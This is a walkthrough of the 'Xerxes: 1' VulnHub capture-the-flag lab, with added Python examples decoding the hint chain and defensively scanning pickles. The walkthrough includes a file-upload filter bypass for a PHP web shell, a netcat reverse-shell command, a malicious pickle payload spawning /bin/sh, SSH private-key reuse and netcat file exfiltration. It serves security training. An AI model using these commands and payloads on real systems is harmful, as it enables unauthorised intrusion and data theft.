Xerxes: 1 Vulnhub Walkthrough
Welcome to another boot2root CTF challenge, “Xerxes: 1”, uploaded by bas on VulnHub. The box has a theme, and you will need to snag the flag to complete the challenge. You can download it from the link below:
https://download.vulnhub.com/xerxes/xerxes.tar.gz
According to the author, it requires a good variety of techniques to get root, with no exploit development or buffer overflows. Drawing on our experience and knowledge, we worked through the lab as follows.
Level: Beginner
Penetrating Methodologies:
- Network scanning (Nmap)
- Surfing HTTP web services
- Directory bruteforcing (Dirb)
- Base64 decoding
- GIMP editor to zoom the image and find the hint
- Decimal to ASCII conversion, Brainfuck interpretation
- Search and Capture the flag at various stages
Walkthrough
The first step is as always, running netdiscover on the VM to grab the IP address. In my case, the IP was 192.168.1.102.
Now, let us run a scan on the discovered IP address to see the available ports.
nmap -A 192.168.1.102
From the nmap scan result, we found port 80 open for the HTTP service, so let’s navigate to port 80 in the browser.
Since the home page offered no remarkable clue, we used dirb for web directory enumeration without wasting much time and executed the following command:
dirb http://192.168.1.102
From the above scan we found another directory, /dev, so let’s browse it.
http://192.168.1.102/dev
Here we found the link provided for forgot password, so we will browse it to see if there is something useful.
To our surprise, there is a QR code, so let’s scan it to see what is hidden inside. On scanning the QR code we found a base64-encoded string.
Now let’s decode the base64 string to find if there is any hint or useful information available.
The clue said to look deeper, so we zoomed into the image and noticed a few pixels in the top-left corner that differ from their surroundings. To read them we used the colour picker in the GIMP editor: open the image with Open as Layers from the File menu, deselect all the layers except the alpha layer of the image, then use the Color Picker tool from the Tools menu to read the alpha value of each of those pixels.
After collecting all the alpha values, we convert these decimal values to their ASCII characters.
The ASCII characters turn out to be a base64-encoded value, so let’s decode it and see what we get.
Decoding the base64 gives a program written in Brainfuck, an esoteric language, so let’s run it through a Brainfuck interpreter to recover the string it prints.
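To show the whole decoding chain end to end, here is an added Python example (not from the original post): it takes a constructed list of alpha values standing in for the ones read in GIMP, converts them to ASCII, base64-decodes the result and interprets the Brainfuck program. The real image's values are not reproduced here; the sample program simply prints "Hi".

```python
import base64

# Constructed sample: a tiny Brainfuck program that prints "Hi", hidden the way
# the challenge hides its hint (Brainfuck -> base64 -> ASCII codes stored as
# pixel alpha values). These are NOT the values from the real image.
BF_PROGRAM = "++++++++[>+++++++++<-]>.>++++++++++[>++++++++++<-]>+++++."
SAMPLE_ALPHA = list(base64.b64encode(BF_PROGRAM.encode("ascii")))


def run_brainfuck(program: str, max_steps: int = 100_000) -> str:
    """Interpret a Brainfuck program that takes no input; return its output."""
    # Pre-match the brackets so loop jumps are O(1) and imbalance is caught early.
    jump, stack = {}, []
    for i, ch in enumerate(program):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError("unbalanced brackets in Brainfuck source")
    tape, ptr, pc, out, steps = [0] * 30_000, 0, 0, [], 0
    while pc < len(program):
        steps += 1
        if steps > max_steps:  # a hint that never terminates is treated as bad input
            raise RuntimeError("step limit exceeded")
        ch = program[pc]
        if ch == ">": ptr += 1
        elif ch == "<": ptr -= 1
        elif ch == "+": tape[ptr] = (tape[ptr] + 1) % 256   # 8-bit cells wrap
        elif ch == "-": tape[ptr] = (tape[ptr] - 1) % 256
        elif ch == ".": out.append(chr(tape[ptr]))
        elif ch == "[" and tape[ptr] == 0: pc = jump[pc]  # skip the loop body
        elif ch == "]" and tape[ptr] != 0: pc = jump[pc]  # loop again
        pc += 1
    return "".join(out)


def decode_hint(alpha_values) -> str:
    """Decimal alpha values -> ASCII text -> base64-decode -> run as Brainfuck."""
    ascii_text = "".join(chr(v) for v in alpha_values)
    bf_source = base64.b64decode(ascii_text).decode("ascii")
    return run_brainfuck(bf_source)


if __name__ == "__main__":
    print("alpha values:", SAMPLE_ALPHA)
    print("recovered string:", decode_hint(SAMPLE_ALPHA))
```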
Now let us try this value as the password for the upload form. Uploading a PHP shell directly did not work, so we uploaded the shell with the “pht” extension instead.
Now access the shell from the URL and run the ls command to confirm that the uploaded file executes our commands (remote code execution).
Since the upload gives us RCE, we can get a reverse shell from the victim’s machine by requesting the following URL.
http://192.168.1.102/dev/upload/shell.pht?cmd=nc -e /bin/bash 192.168.1.109 1234
Meanwhile, keep a netcat listener active on the Kali terminal:
nc -lvp 1234
As soon as we get our reverse connection, the first thing we do is upgrade the session to a more interactive one, using a Python one-liner to spawn a proper TTY running bash:
python -c 'import pty;pty.spawn("/bin/bash")'
Now let’s go to /home and see how many users there are.
cd /home
ls
Here we found three users named amanpour, curtiz and delacroix; we will first head into amanpour and check its contents.
cd amanpour
ls -la
Here we found a .bash_history file, so we check its contents.
cat .bash_history
In this file you will find the Python command used to generate a new password; run it and you will get the password.
python steqr.py -f newpassword
Now we have the password of amanpour, so let’s connect as amanpour over SSH with these credentials.
ssh amanpour@192.168.1.102
Here we search for files with the SUID bit set.
find / -perm -4000 -type f 2>/dev/null
Here we found the file /opt/notes, so let’s go into the /opt directory to see what else is there. Alongside notes we also find notes.py, so we look at its contents.
cd /opt
ls
cat notes.py
From notes.py we learn that any file the notes executable loads must either live in /home/curtiz or be given as a path starting with ../../, which first steps back up to / and then lets us supply a full path from there.
notes.py uses the pickle module, and pickle is vulnerable to insecure deserialization: a file it loads can execute arbitrary code, so we can run any code of our choice. Since we can make the script load any file, we created a pickle that executes “/bin/sh”.
cat > /tmp/shell
cos
system
(S'/bin/sh'
tR.
Now run the notes executable and load the shell file directly from /tmp:
./notes load ../../tmp/shell
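From the defender's side, the lesson of notes.py is that pickle.load on a file an untrusted user controls is code execution. The added Python example below (not part of the original post or of the challenge's own code) shows two checks a loader can apply before trusting such a file: a static scan of the opcode stream with pickletools, and a restricted Unpickler that refuses to resolve globals such as os.system. It is exercised against the payload written to /tmp/shell above and against a constructed benign note.

```python
import builtins
import io
import pickle
import pickletools

# Opcodes that let a pickle reach into the interpreter: GLOBAL/STACK_GLOBAL
# import a callable, REDUCE/INST/OBJ call it, BUILD invokes __setstate__.
DANGEROUS_OPS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ", "BUILD"}

# The protocol-0 pickle from the walkthrough above: GLOBAL os.system, then
# REDUCE with the tuple ('/bin/sh',). Never passed to pickle.loads here.
PAGE_PAYLOAD = b"cos\nsystem\n(S'/bin/sh'\ntR."
# Constructed benign note, the kind of object a notes app legitimately stores.
SAMPLE_SAFE_PICKLE = pickle.dumps({"note": "buy milk"})


def dangerous_ops(data: bytes) -> list:
    """Static check: walk the opcode stream without executing anything and
    return, in order, the names of opcodes that can invoke code."""
    return [op.name for op, _arg, _pos in pickletools.genops(data)
            if op.name in DANGEROUS_OPS]


class RestrictedUnpickler(pickle.Unpickler):
    """Resolve only a small allow-list of builtins; refuse every other import."""
    SAFE_BUILTINS = {"dict", "list", "set", "tuple", "str", "int", "float", "bool"}

    def find_class(self, module, name):
        if module == "builtins" and name in self.SAFE_BUILTINS:
            return getattr(builtins, name)
        # Reached for the payload above with module="os", name="system".
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def restricted_loads(data: bytes):
    """pickle.loads replacement that goes through the restricted resolver."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_rejected(data: bytes) -> bool:
    """True when the restricted loader refuses the data instead of loading it."""
    try:
        restricted_loads(data)
        return False
    except pickle.UnpicklingError:
        return True


if __name__ == "__main__":
    print("payload opcodes flagged:", dangerous_ops(PAGE_PAYLOAD))
    print("payload rejected:", is_rejected(PAGE_PAYLOAD))
    print("benign note loads as:", restricted_loads(SAMPLE_SAFE_PICKLE))
```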
As soon as we load /tmp/shell we get a shell. Checking id, we found that amanpour is also a member of the curtiz group, so we now go to the curtiz home directory.
cd /home/curtiz
Listing the directory, we find a file called notes. Its content gives us a hint to log in as the user Marie.
ls
cat notes
We check the passwd file to see whether a user “Marie” exists, and find that Marie is the first name of the user “delacroix”. We also see that this account uses a custom shell, “/bin/delacroix”.
cat /etc/passwd | grep "Marie"
Now let’s look at the contents of “/bin/delacroix” with the strings utility; here you’ll find an MD5 hash.
strings /bin/delacroix
Now let’s crack the MD5 hash with an online lookup, which gives us “VonBraun”.
Let’s try to connect as delacroix via SSH with this password, but the login fails.
ssh delacroix@192.168.1.102
Back in the /home/curtiz directory there was a file called id_rsa. Checking its content, we find it is an RSA private key.
cat id_rsa
We copy the RSA key from the target machine to our machine, then log in through SSH using the private key.
ssh -i id_rsa delacroix@192.168.1.102
After logging in, we check the contents of “/home/delacroix” and discover two files, check.sh and generate.sh. The “check.sh” script produces the customised login message, while “generate.sh” creates a new “.last” file and uses that file’s timestamp to generate a unique MD5 hash.
So we need the MD5 hash of the creation time of “.last”; first we use the stat command to check when the file was created.
stat .last
With the timestamp of “.last” in hand, we compute the MD5 hash by piping the time at which Marie created the file through md5sum with echo:
echo 00:19:51 | md5sum
Now we have the password too, so let’s capture the flag: open a root shell with sudo bash and the password we found, and BOOM, you’re logged in as root.
Look around to find the flag: cd to the root directory and ls its contents. You will find a file called flag.
cd /root
ls
When we check the type of the flag file, it is reported as PNG image data.
file flag
Let’s use netcat to transfer this file to our Kali machine:
nc 192.168.1.109 5555 < flag
Meanwhile, start a netcat listener on the Kali machine, redirecting the incoming data to a new file:
nc -lvp 5555 > flag
Finally we open the flag file, and it’s done.
Author: Deepanshu is a Certified Ethical Hacker and a budding security researcher.